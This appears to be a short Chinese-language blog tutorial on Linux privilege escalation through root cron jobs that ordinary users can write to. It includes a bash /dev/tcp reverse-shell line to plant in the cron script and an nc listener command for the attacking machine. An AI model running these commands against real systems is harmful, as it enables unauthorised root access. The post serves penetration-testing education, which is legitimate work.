linux-提权-cron计划任务

如果发现有root创建的计划任务并且普通用户能修改,那就可以写shell

1.输入命令 cat /etc/crontab 查看计划任务:

上图可见有一个root创建的备份文件

尝试反向弹shell:

在被攻击机的cron中的文件输入:
bash -i >& /dev/tcp/攻击机ip/攻击机监听端口 0>&1

攻击机开启nc: nc -lvnp 6666

当被攻击机运行上述文件时,会反弹shell(ls -la看一下文件权限,需要的时候chmod +x 给一个执行权限)自动运行才弹root,不是自动运行的话只是弹文件所属人的shell,不算提权成功。


Crontab 始终值得检查,因为它有时会导致简单的特权升级。以下场景在不具备一定网络安全成熟度级别的公司中并不少见:

  1. 系统管理员需要定期运行脚本。
  2. 他们创建了一个 cron 作业来执行此操作
  3. 一段时间后,脚本变得无用,他们将其删除(但是计划任务还在)
  4. 他们不清理相关的 cron 作业

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注